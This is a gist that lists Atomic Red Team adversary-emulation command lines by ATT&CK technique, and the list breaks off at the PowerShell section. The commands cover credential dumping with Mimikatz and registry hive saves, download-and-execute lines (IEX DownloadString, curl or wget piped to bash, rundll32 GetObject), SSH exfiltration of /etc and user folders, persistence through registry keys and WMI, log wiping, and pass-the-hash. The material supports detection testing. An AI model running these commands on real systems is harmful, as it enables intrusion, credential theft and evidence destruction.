Created
September 5, 2018 10:18
-
-
Save jivoi/14bed63b9d99b7fc9414f2882c45709d to your computer and use it in GitHub Desktop.
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
| / \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
| / _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
| / ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
| /_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
| [********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) | |
| Compress Data for Exfiltration With PowerShell | |
| TODO | |
| dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} | |
| Compress Data for Exfiltration With Rar | |
| TODO | |
| rar a -r #{output_file} #{input_file} | |
| Data Compressed - nix | |
| TODO | |
| mkdir /tmp/victim-files | |
| cd /tmp/victim-files | |
| touch a b c d e f g | |
| echo "This file will be gzipped" > /tmp/victim-gzip.txt | |
| echo "This file will be tarred" > /tmp/victim-tar.txt | |
| zip /tmp/victim-files.zip /tmp/victim-files/* | |
| gzip -f /tmp/victim-gzip.txt | |
| tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/ | |
| tar -cvzf /tmp/victim-tar.tar.gz | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Credential Dumping T1003 has 4 Test(s) | |
| Powershell Mimikatz | |
| Dumps Credentials via Powershell by invoking a remote mimikatz script | |
| IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds | |
| Gsecdump | |
| https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 | |
| gsecdump -a | |
| Windows Credential Editor | |
| http://www.ampliasecurity.com/research/windows-credentials-editor/ | |
| wce -o #{output_file} | |
| Registry dump of SAM, creds, and secrets | |
| Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated | |
| via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 | |
| reg save HKLM\sam sam | |
| reg save HKLM\system system | |
| reg save HKLM\security security | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] System Service Discovery T1007 has 1 Test(s) | |
| System Service Discovery | |
| Identify system services | |
| tasklist.exe | |
| sc query | |
| sc query state= all | |
| sc start #{service_name} | |
| sc stop #{service_name} | |
| wmic service where (displayname like "#{service_name}") get name | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Query Registry T1012 has 1 Test(s) | |
| Query Registry | |
| Query Windows Registry | |
| References: | |
| https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | |
| https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services | |
| References: | |
| http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf | |
| https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf | |
| reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" | |
| reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | |
| reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | |
| reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | |
| reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | |
| reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | |
| reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | |
| reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | |
| reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | |
| reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | |
| reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | |
| reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | |
| reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | |
| reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | |
| reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | |
| reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | |
| reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | |
| reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$" | |
| reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | |
| reg save HKLM\Security security.hive | |
| reg save HKLM\System system.hive | |
| reg save HKLM\SAM sam.hive | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Loadable Kernel Module based Rootkit T1014 has 3 Test(s) | |
| Loadable Kernel Module based Rootkit | |
| Loadable Kernel Module based Rootkit | |
| sudo insmod #{rootkit_file} | |
| Loadable Kernel Module based Rootkit | |
| Loadable Kernel Module based Rootkit | |
| sudo modprobe #{rootkit_file} | |
| LD_PRELOAD based Rootkit | |
| LD_PRELOAD based Rootkit | |
| export LD_PRELOAD=$PWD/#{rootkit_file} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Accessibility Features T1015 has 7 Test(s) | |
| Attaches Command Prompt As Debugger To Process - osk | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| Attaches Command Prompt As Debugger To Process - sethc | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| Attaches Command Prompt As Debugger To Process - utilman | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| Attaches Command Prompt As Debugger To Process - magnify | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| Attaches Command Prompt As Debugger To Process - narrator | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| Attaches Command Prompt As Debugger To Process - DisplaySwitch | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| Attaches Command Prompt As Debugger To Process - AtBroker | |
| This allows adversaries to execute the attached process | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] System Network Configuration Discovery T1016 has 2 Test(s) | |
| System Network Configuration Discovery | |
| Identify network configuration information | |
| ipconfig /all | |
| netsh interface show | |
| arp -a | |
| nbtstat -n | |
| net config | |
| System Network Configuration Discovery | |
| Identify network configuration information | |
| arp -a | |
| netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c | |
| ifconfig | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Remote System Discovery T1018 has 5 Test(s) | |
| Remote System Discovery - net | |
| Identify remote systems with net.exe | |
| net view /domain | |
| net view | |
| Remote System Discover - ping sweep | |
| Identify remote systems via ping sweep | |
| for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i | |
| Remote System Discover - arp | |
| Identify remote systems via arp | |
| arp -a | |
| Remote System Discovery - arp nix | |
| Identify remote systems via arp | |
| arp -a | grep -v '^?' | |
| Remote System Discovery - sweep | |
| Identify remote systems via ping sweep | |
| for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Data Encrypted T1022 has 1 Test(s) | |
| Data Encrypted | |
| TODO | |
| echo "This file will be encrypted" > /tmp/victim-gpg.txt | |
| mkdir /tmp/victim-files | |
| cd /tmp/victim-files | |
| touch a b c d e f g | |
| zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/* | |
| gpg -c /tmp/victim-gpg.txt | |
| <enter passphrase and confirm> | |
| ls -l | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Windows Remote Management T1028 has 5 Test(s) | |
| Enable Windows Remote Management | |
| Powershell Enable WinRM | |
| powershell Enable-PSRemoting -Force | |
| PowerShell Lateral Movement | |
| Powershell lateral movement using the mmc20 application com object | |
| Reference: | |
| https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ | |
| powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") | |
| WMIC Process Call Create | |
| Utilize WMIC to start remote process | |
| wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | |
| Psexec | |
| Utilize psexec to start remote process | |
| psexec \\host -u domain\user -p password -s cmd.exe | |
| Invoke-Command | |
| Execute Invoke-command on remote host | |
| invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Data Transfer Size Limits T1030 has 1 Test(s) | |
| Data Transfer Size Limits | |
| Take a file/directory, split it into 5Mb chunks | |
| cd /tmp/ | |
| dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 | |
| split -b 5000000 /tmp/victim-whole-file | |
| ls -l | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Modify Existing Service T1031 has 1 Test(s) | |
| Modify Fax service to run PowerShell | |
| This test will temporarily modify the service Fax by changing the binPath to PowerShell | |
| and will then revert the binPath change, restoring Fax to its original state. | |
| sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" | |
| sc start Fax | |
| sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] System Owner/User Discovery T1033 has 2 Test(s) | |
| System Owner/User Discovery | |
| Identify System owner or users on an endpoint | |
| cmd.exe /C whoami | |
| wmic useraccount get /ALL | |
| quser /SERVER:"#{computer_name}" | |
| quser | |
| qwinsta.exe" /server:#{computer_name} | |
| qwinsta.exe | |
| for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt | |
| @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt | |
| System Owner/User Discovery | |
| Identify System owner or users on an endpoint | |
| users | |
| w | |
| who | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Logon Scripts T1037 has 2 Test(s) | |
| Logon Scripts | |
| Added Via Reg.exe | |
| REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Network Sniffing T1040 has 4 Test(s) | |
| Packet Capture Linux | |
| Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. | |
| tcpdump -c 5 -nnni #{interface} | |
| tshark -c 5 -i #{interface} | |
| Packet Capture MacOS | |
| Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. | |
| tcpdump -c 5 -nnni #{interface} | |
| tshark -c 5 -i #{interface} | |
| Packet Capture Windows Command Prompt | |
| Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark | |
| installed, along with WinPCAP. Windump will require the windump executable. | |
| c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 | |
| c:\windump.exe | |
| Packet Capture PowerShell | |
| Perform a packet capture using PowerShell with windump or tshark. This will require a host that has Wireshark/Tshark | |
| installed, along with WinPCAP. Windump will require the windump executable. | |
| c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 | |
| c:\windump.exe | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Change Default File Association T1042 has 1 Test(s) | |
| Change Default File Association | |
| Change Default File Association From cmd.exe | |
| cmd.exe assoc #{extension_to_change}="#{thing_to_execute}" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Network Service Scanning T1046 has 2 Test(s) | |
| Port Scan | |
| Scan ports to check for listening ports | |
| for port in {1..65535}; | |
| do | |
| echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; | |
| done | |
| Port Scan Nmap | |
| Scan ports to check for listening ports with Nmap. | |
| nmap -sS #{network_range} -p #{port} | |
| telnet #{host} #{port} | |
| nc -nv #{host} #{port} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Windows Management Instrumentation T1047 has 4 Test(s) | |
| WMI Reconnaissance Users | |
| WMI List User Accounts | |
| wmic useraccount get /ALL | |
| WMI Reconnaissance Processes | |
| WMI List Processes | |
| wmic process get caption,executablepath,commandline | |
| WMI Reconnaissance Software | |
| WMI List Software | |
| wmic qfe get description,installedOn /format:csv | |
| WMI Reconnaissance List Remote Services | |
| WMI List Remote Services | |
| wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Exfiltration Over Alternative Protocol T1048 has 3 Test(s) | |
| Exfiltration Over Alternative Protocol - SSH | |
| Input a domain and test Exfiltration over SSH | |
| Remote to Local | |
| ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz | |
| Exfiltration Over Alternative Protocol - SSH | |
| Input a domain and test Exfiltration over SSH | |
| Local to Remote | |
| tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] System Network Connections Discovery T1049 has 3 Test(s) | |
| System Network Connections Discovery | |
| Get a listing of network connections. | |
| netstat | |
| net use | |
| net sessions | |
| System Network Connections Discovery with PowerShell | |
| Get a listing of network connections. | |
| Get-NetTCPConnection | |
| System Network Connections Discovery Linux & MacOS | |
| Get a listing of network connections. | |
| netstat | |
| who -a | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Service Installation T1050 has 2 Test(s) | |
| Service Installation | |
| Installs A Local Service | |
| sc create TestService binPath="C:\Path\file.exe" | |
| Service Installation PowerShell Installs A Local Service using PowerShell | |
| Installs A Local Service via PowerShell | |
| powershell New-Service -Name "TestService" -BinaryPathName "C:\Path\file.exe" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Scheduled Task T1053 has 3 Test(s) | |
| At.exe Scheduled task | |
| Executes cmd.exe | |
| Note: deprecated in Windows 8+ | |
| at 13:20 /interactive cmd | |
| Scheduled task Local | |
| SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} | |
| Scheduled task Remote | |
| Create a task on a remote system | |
| SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Process Injection T1055 has 2 Test(s) | |
| Process Injection via mavinject.exe | |
| Windows 10 Utility To Inject DLLS | |
| mavinject $pid /INJECTRUNNING #{dll_payload} | |
| Process Injection via PowerSploit | |
| PowerShell Injection | |
| Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Input Capture T1056 has 1 Test(s) | |
| Input Capture | |
| Utilize PowerShell and external resource to capture keystrokes | |
| [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1) | |
| Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) | |
| .\Get-Keystrokes.ps1 -LogPath #{filepath} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Process Discovery T1057 has 1 Test(s) | |
| Process Discovery - ps | |
| Utilize ps to identify processes | |
| ps >> #{output_file} | |
| ps aux >> #{output_file} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Command-Line Interface T1059 has 1 Test(s) | |
| Command-Line Interface | |
| Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. | |
| This will download the specified payload and set a marker file in `/tmp/art-fish.txt`. | |
| bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" | |
| bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Registry Run Keys / Start Folder T1060 has 4 Test(s) | |
| Reg Key Run | |
| Run Key Persistence | |
| REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" | |
| Reg Key RunOnce | |
| RunOnce Key Persistence | |
| REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" | |
| PowerShell Registry RunOnce | |
| RunOnce Key Persistence via PowerShell | |
| $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" | |
| set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' | |
| Startup Folder | |
| Add Shortcut To Startup via PowerShell | |
| $TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}" | |
| $ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk" | |
| $WScriptShell = New-Object -ComObject WScript.Shell | |
| $Shortcut = $WScriptShell.CreateShortcut($ShortcutFile) | |
| $Shortcut.TargetPath = $TargetFile | |
| $Shortcut.Save() | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Hypervisor T1062 has 1 Test(s) | |
| Installing Hyper-V Feature | |
| PowerShell command to check if Hyper-v is installed . | |
| Install Hyper-V feature. | |
| Create a New-VM | |
| Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} | |
| Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools | |
| New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Security Software Discovery T1063 has 3 Test(s) | |
| Security Software Discovery | |
| Methods to identify Security Software on an endpoint | |
| netsh.exe advfirewall firewall show all profiles | |
| tasklist.exe | |
| tasklist.exe | findstr /i virus | |
| tasklist.exe | findstr /i cb | |
| tasklist.exe | findstr /i defender | |
| tasklist.exe | findstr /i cylance | |
| Security Software Discovery - powershell | |
| Methods to identify Security Software on an endpoint | |
| powershell.exe get-process | ?{$_.Description -like "*virus*"} | |
| powershell.exe get-process | ?{$_.Description -like "*carbonblack*"} | |
| powershell.exe get-process | ?{$_.Description -like "*defender*"} | |
| powershell.exe get-process | ?{$_.Description -like "*cylance*"} | |
| Security Software Discovery - ps | |
| Methods to identify Security Software on an endpoint | |
| ps -ef | grep Little\ Snitch | grep -v grep | |
| ps aux | grep CbOsxSensorService | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls. T1065 has 2 Test(s) | |
| Testing usage of uncommonly used port with PowerShell | |
| Testing uncommonly used port utilizing PowerShell | |
| test-netconnection -ComputerName #{hostname} -port #{port} | |
| Testing usage of uncommonly used port | |
| Testing uncommonly used port utilizing telnet. | |
| telnet #{hostname} #{port} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Permission Groups Discovery T1069 has 3 Test(s) | |
| Permission Groups Discovery | |
| Permission Groups Discovery | |
| dscacheutil -q group | |
| dscl . -list /Groups | |
| groups | |
| Permission Groups Discovery Windows | |
| Permission Groups Discovery for Windows | |
| net localgroup | |
| net group /domain | |
| Permission Groups Discovery PowerShell | |
| Permission Groups Discovery utilizing PowerShell | |
| get-localgroup | |
| get-ADPrinicipalGroupMembership #{user} | select name | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Indicator Removal on Host T1070 has 3 Test(s) | |
| Clear Logs | |
| Clear Windows Event Logs | |
| wevtutil cl #{log_name} | |
| FSUtil | |
| Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. | |
| fsutil usn deletejournal /D C: | |
| rm -rf | |
| Delete system and audit logs | |
| rm -rf /private/var/log/system.log* | |
| rm -rf /private/var/audit/* | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Pass the Hash T1075 has 2 Test(s) | |
| Mimikatz Pass the Hash | |
| Note: must dump hashes first | |
| [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) | |
| mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm} | |
| Mimikatz Kerberos Ticket Attack | |
| Similar to PTH, but attacking Kerberos | |
| mimikatz # kerberos::ptt #{username}@#{Domain} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Remote Desktop Protocol T1076 has 1 Test(s) | |
| RDP | |
| RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization | |
| query user | |
| sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" | |
| net start sesshijack | |
| sc.exe delete sesshijack | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Windows Admin Shares T1077 has 2 Test(s) | |
| Map admin share | |
| Connecting To Remote Shares | |
| cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" | |
| Map Admin Share PowerShell | |
| Map Admin share utilizing PowerShell | |
| New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Credentials in Files T1081 has 4 Test(s) | |
| Browser and System credentials | |
| [LaZagne Source](https://github.com/AlessandroZ/LaZagne) | |
| python2 laZagne.py all | |
| Extract credentials from files | |
| Extracting credentials from files | |
| grep -riP password #{file_path} | |
| Mimikatz & Kittenz | |
| Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module. | |
| invoke-mimikittenz | |
| mimikatz.exe | |
| Extracting credentials from files | |
| Extracting Credentials from Files | |
| findstr /si pass *.xml | *.doc | *.txt | *.xls | |
| ls -R | select-string -Pattern password | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] System Information Discovery T1082 has 3 Test(s) | |
| System Information Discovery | |
| Identify System Info | |
| systeminfo | |
| reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum | |
| System Information Discovery | |
| Identify System Info | |
| systemsetup | |
| system_profiler | |
| ls -al /Applications | |
| List OS Information | |
| Identify System Info | |
| uname -a >> /tmp/loot.txt | |
| cat /etc/lsb-release >> /tmp/loot.txt | |
| cat /etc/redhat-release >> /tmp/loot.txt | |
| uptime >> /tmp/loot.txt | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] File and Directory Discovery T1083 has 4 Test(s) | |
| File and Directory Discovery | |
| Find or discover files on the file system | |
| dir /s c:\ >> %temp%\download | |
| dir /s "c:\Documents and Settings" >> %temp%\download | |
| dir /s "c:\Program Files\" >> %temp%\download | |
| dir /s d:\ >> %temp%\download | |
| dir "%systemdrive%\Users\*.*" >> %temp%\download | |
| dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download | |
| dir "%userprofile%\Desktop\*.*" >> %temp%\download | |
| tree /F >> %temp%\download | |
| File and Directory Discovery | |
| Find or discover files on the file system | |
| ls -recurse | |
| get-childitem -recurse | |
| gci -recurse | |
| Nix File and Diectory Discovery | |
| Find or discover files on the file system | |
| References: | |
| http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ | |
| https://perishablepress.com/list-files-folders-recursively-terminal/ | |
| ls -a > allcontents.txt | |
| ls -la /Library/Preferences/ > detailedprefsinfo.txt | |
| file */* *>> ../files.txt | |
| find . -type f | |
| ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' | |
| locate * | |
| which sh | |
| Nix File and Directory Discovery | |
| Find or discover files on the file system | |
| cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt | |
| cat /etc/mtab > /tmp/loot.txt | |
| find . -type f -iname *.pdf > /tmp/loot.txt | |
| find . -type f -name ".*" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Windows Management Instrumentation Event Subscription T1084 has 2 Test(s) | |
| Persistence | |
| Run from an administrator powershell window | |
| After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. | |
| Code references | |
| https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af | |
| https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 | |
| $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; | |
| EventNameSpace='root\CimV2'; | |
| QueryLanguage="WQL"; | |
| Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; | |
| $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs | |
| $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; | |
| CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} | |
| $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs | |
| $FilterToConsumerArgs = @{ | |
| Filter = [Ref] $Filter; | |
| Consumer = [Ref] $Consumer; | |
| } | |
| $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs | |
| Persistence Cleanup | |
| Run from an administrator powershell window | |
| Code references | |
| https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af | |
| https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 | |
| $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" | |
| $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" | |
| $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" | |
| $FilterConsumerBindingToCleanup | Remove-WmiObject | |
| $EventConsumerToCleanup | Remove-WmiObject | |
| $EventFilterToCleanup | Remove-WmiObject | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Rundll32 T1085 has 1 Test(s) | |
| Rundll32 execute JavaScript Remote Payload With GetObject | |
| Test execution of a remote script using rundll32.exe | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] PowerShell T1086 has 10 Test(s) | |
| Mimikatz | |
